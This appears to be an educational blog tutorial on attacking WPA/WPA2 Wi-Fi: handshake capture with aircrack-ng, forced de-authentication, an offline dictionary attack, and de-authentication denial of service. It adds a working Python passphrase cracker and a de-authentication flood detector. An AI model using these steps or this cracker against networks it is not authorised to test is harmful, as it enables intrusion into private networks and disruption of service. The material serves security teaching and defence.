Let's crack the WiFi Password, Dude!
Maruf Farhan
CSC Tutor, University of Sussex ISC | Visiting Lecturer, Cybersecurity at Coventry University | Educator (Kingsley Institute of Management) | MSc Cybersecurity | CompTIA Sec+ Certified | Blockchain Researcher
[This post is to raise awareness about hacking and cybersecurity. Do not keep the default password: change it immediately and use a proper combination of letters, numbers, and symbols.]
Let's Crack WPA/WPA2
WPA is the successor to WEP, released by the Wi-Fi Alliance in 2003 as an interim standard. It uses TKIP (Temporal Key Integrity Protocol), which fixed the worst WEP weaknesses while still running on existing WEP hardware through a firmware update; WPA2 (802.11i) later replaced TKIP with AES-CCMP. Neither protocol is broken cryptographically, but a WPA/WPA2 network using a pre-shared key (PSK) can still be attacked offline with a dictionary attack, because the network is only as strong as the passphrase. The inputs for this attack are the four-way WPA handshake between a client and the access point (in practice only two consecutive messages of it are needed, since what gets checked is the MIC on message 2 or 3) and a wordlist of candidate passphrases. Using a tool such as aircrack-ng, we then test each candidate against the captured handshake. First, we need a wireless adapter (dongle) whose driver supports monitor mode and packet injection; then we follow the steps below.
Step 1:
We first need to put the wireless interface into monitor mode.
Run iwconfig first to identify the interface (on my computer the device is called wlan0; on your computer the name can be different). Then put it into monitor mode with airmon-ng, the aircrack-ng tool that creates the monitor interface.
To verify the change, run iwconfig again: the interface is now listed as wlan0mon instead of wlan0, which means it is in monitor mode. Next, launch airodump-ng on wlan0mon with the command shown in the screenshot so that it starts capturing and saving every packet on the air.
Once airodump-ng is running, you will see the beacons and other management frames of nearby wireless networks listed on screen. Use this listing to pick the access point you want to target, then run airodump-ng again locked to that network's BSSID and channel, writing the capture to a file.
Here,
· bssid is the MAC address of the target wireless access point.
· channel 11 is the channel the access point is running on.
· WPACrackingDemo is the file name prefix I have used to save the captured packets.
We now have two options: wait for a fresh client to connect to the access point so that we can record the four-way WPA handshake, or send a broadcast de-authentication packet that forces the already-connected clients to reconnect (and therefore to perform the handshake again). To hasten the process, we do the latter. If you hit the "fixed channel -1" error again at this point, the same fix applies as before:
use --ignore-negative-one. This can also require more than one attempt. As soon as a handshake is captured, airodump-ng indicates it in the top-right corner of the screen with "WPA handshake:" followed by the access point's BSSID.
If you are using --ignore-negative-one, the fixed-channel message may overwrite that notice, so watch for a brief flash of the WPA handshake text. If we check our working directory, we should now see that a .cap file has been generated.
We can stop airodump-ng now. Let's open the capture file in Wireshark and view the four-way handshake. The handshake packets are the ones whose protocol is EAPOL; you can show only those by typing eapol into the display filter bar.
The real key-cracking work will now begin. It needs the wordlist of common passphrases mentioned earlier.
We will now invoke aircrack-ng with the .cap file as input and the path to the dictionary file, as shown in the following screenshot. I have used passwords.lst, which I saved on the Desktop, as shown in the terminal.
aircrack-ng derives a key from each passphrase in the dictionary file and checks it against the captured handshake. If the passphrase is present in the dictionary file, it will eventually find it.
Please note that, as this is a dictionary attack, the prerequisite is that the passphrase must be present in the wordlist you supply to aircrack-ng. The attack will fail if the passphrase is not present, no matter how long it runs; the only way to search further is a bigger or better-targeted wordlist. Every candidate costs 4096 iterations of PBKDF2-HMAC-SHA1, which is why the attack is slow and why a long random passphrase is out of reach.
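To show what aircrack-ng is actually doing per candidate passphrase, here is an added example (not code from the original post): it derives the PMK with PBKDF2, expands it to the PTK, and compares the EAPOL-Key MIC on message 2 of a handshake. The SSID, MAC addresses, nonces and wordlist are constructed in the code, and the "captured" message 2 is built from a secret passphrase so the search has something to recover; only the PMK derivation is checked against the standard's own test vector.

```python
"""WPA2-PSK dictionary attack, end to end, on a constructed handshake.

Added example for this post (not from the original article). It mirrors what
aircrack-ng does for every candidate passphrase: derive the PMK with PBKDF2,
expand it to the PTK, and compare the EAPOL-Key MIC on message 2 of the
four-way handshake. SSID, MACs, nonces and the wordlist are all constructed.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL header (4) + key descriptor fields before the Key MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PRF-512: HMAC-SHA1 counter mode over the label, the sorted MACs and nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64-byte PTK
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]  # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with
    the MIC field zeroed, truncated to 16 bytes. (WPA/TKIP, version 1, uses HMAC-MD5.)"""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2: RSN descriptor, key info = version 2 | pairwise | MIC."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1)       # desc type, key info, key len, replay ctr
    body += snonce + bytes(16) + bytes(8) + bytes(8)     # key nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", 0)                   # key MIC, key data length (no RSN IE here)
    return struct.pack(">BBH", 1, 3, len(body)) + body   # EAPOL version 1, type 3 = Key


def make_capture(passphrase: str, ssid: str) -> dict:
    """Constructed 'captured handshake', i.e. what airodump-ng's .cap file would give us."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                         # constructed
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "msg2": msg2}


def crack(capture: dict, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None."""
    snonce = capture["msg2"][17:49]                      # SNonce sits at offset 17 of message 2
    want = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["msg2"]), want):
            return word
    return None


if __name__ == "__main__":
    WORDLIST = ["password", "letmein", "Sunflower42", "admin1234"]   # constructed wordlist
    cap = make_capture("Sunflower42", "HomeNet")
    print("recovered:", crack(cap, WORDLIST))
    print("not in list:", crack(cap, ["qwerty", "12345678"]))
```

The expensive line is pmk_from_passphrase: the PMK depends only on the passphrase and the SSID, so precomputed PMK tables work for common SSIDs but must be rebuilt for an unusual one, while everything after it (the PTK and MIC) is cheap. That is also why the check needs the nonces and both MAC addresses from the capture and not just the EAPOL payload.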
Hurray! Here is the password :
DoS: Deauthentication attacks
Let's connect a Windows client to the access point; the connection appears in the airodump-ng client list. Now, on the attacker machine, let's run a directed de-authentication attack against this client.
Note how the client gets disconnected from the access point completely. We can verify this on the airodump-ng screen as well.
If we use Wireshark to look at the traffic, we will notice a lot of de-authentication frames: the ones we just sent over the air.
We can carry out the same attack by sending broadcast de-authentication frames on behalf of the access point to the entire wireless network. This disconnects all connected clients at once.
We successfully sent de-authentication frames to both the access point and the client, which disconnected them and caused a complete loss of communication between them.
We also sent out broadcast de-authentication frames, ensuring that no client in the vicinity could stay connected to the access point. It is important to note that, as soon as a client is disconnected, it will try to reconnect, so the de-authentication attack must be sustained (frames sent continuously) to have a full DoS effect.
This works because de-authentication and disassociation frames are unauthenticated management frames in plain WPA/WPA2: anyone who can forge the access point's source MAC can send them. The defence is 802.11w Protected Management Frames (PMF), mandatory in WPA3, which authenticates these frames so that forged ones are dropped. This is one of the easiest attacks to carry out and its effect is severe; it can easily be used in the real world to bring a wireless network to its knees.
And here we are:
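From the defender's side, the flood of de-authentication frames seen in Wireshark above is easy to spot. The following is an added example (not code from the original post) that parses raw 802.11 management frame headers and alerts when a BSSID emits more than a threshold of de-authentication or disassociation frames within a sliding time window. The frames are constructed in the code rather than read from a capture: a few beacons, one legitimate directed de-authentication, then a burst of broadcast de-authentications forged "from" the access point; the MAC addresses and reason codes used are assumptions.

```python
"""Detecting a de-authentication flood from raw 802.11 management frames.

Added example for this post (not from the original article). Frames are built
in code (constructed sample traffic): beacons, a single legitimate deauth, then
a burst of forged broadcast deauths "from" the access point.
"""
import struct
from collections import defaultdict, deque

BROADCAST = b"\xff" * 6
BEACON, DISASSOC, DEAUTH = 8, 10, 12   # 802.11 management frame subtypes


def mgmt_frame(subtype, da, sa, bssid, body=b"", seq=0):
    """Build a management frame: frame control, duration, addr1-3, seq ctrl, body."""
    fc = struct.pack("<H", subtype << 4)   # type 0 (management) in bits 2-3, subtype in bits 4-7
    return fc + struct.pack("<H", 0) + da + sa + bssid + struct.pack("<H", seq << 4) + body


def parse_mgmt(frame):
    """Return (subtype, da, sa, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:               # not a management frame
        return None
    subtype = (fc >> 4) & 0xF
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # 2-byte reason code follows the header
    return subtype, frame[4:10], frame[10:16], frame[16:22], reason


def detect_deauth_flood(packets, window=1.0, threshold=10):
    """packets: iterable of (timestamp_seconds, raw_frame).
    Alert once per BSSID when more than `threshold` deauth/disassoc frames are seen
    within `window` seconds. Returns [(ts, bssid, frames_in_window, broadcast_so_far)]."""
    recent = defaultdict(deque)            # bssid -> timestamps of recent deauth/disassoc
    broadcast_seen = defaultdict(int)      # bssid -> broadcast deauth/disassoc frames so far
    alerted, alerts = set(), []
    for ts, raw in packets:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, da, _, bssid, _ = parsed
        q = recent[bssid]
        q.append(ts)
        if da == BROADCAST:
            broadcast_seen[bssid] += 1
        while q and ts - q[0] > window:    # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((ts, bssid.hex(":"), len(q), broadcast_seen[bssid]))
    return alerts


def constructed_capture():
    """Constructed sample traffic: beacons, one real deauth, then a forged flood."""
    ap = bytes.fromhex("001122334455")      # assumed access point MAC
    client = bytes.fromhex("66778899aabb")  # assumed client MAC
    pkts = [(0.1 * i, mgmt_frame(BEACON, BROADCAST, ap, ap, bytes(12))) for i in range(5)]
    # client leaving normally: directed deauth, reason 3 (sending STA is leaving the ESS)
    pkts.append((0.6, mgmt_frame(DEAUTH, ap, client, ap, struct.pack("<H", 3))))
    # the flood: 40 broadcast deauths "from" the AP in half a second, reason 7
    pkts += [(1.0 + 0.0125 * i,
              mgmt_frame(DEAUTH, BROADCAST, ap, ap, struct.pack("<H", 7), seq=i))
             for i in range(40)]
    return pkts


if __name__ == "__main__":
    for ts, bssid, n, bcast in detect_deauth_flood(constructed_capture()):
        print(f"t={ts:.3f}s deauth flood from {bssid}: {n} frames in window, {bcast} broadcast")
```

A single directed de-authentication is normal (clients leave, access points evict idle stations), so the detector keys on rate and on broadcast destination rather than on any one frame. On a network with 802.11w enabled, forged frames fail the MIC check and never reach this point, which is the reason to turn PMF on.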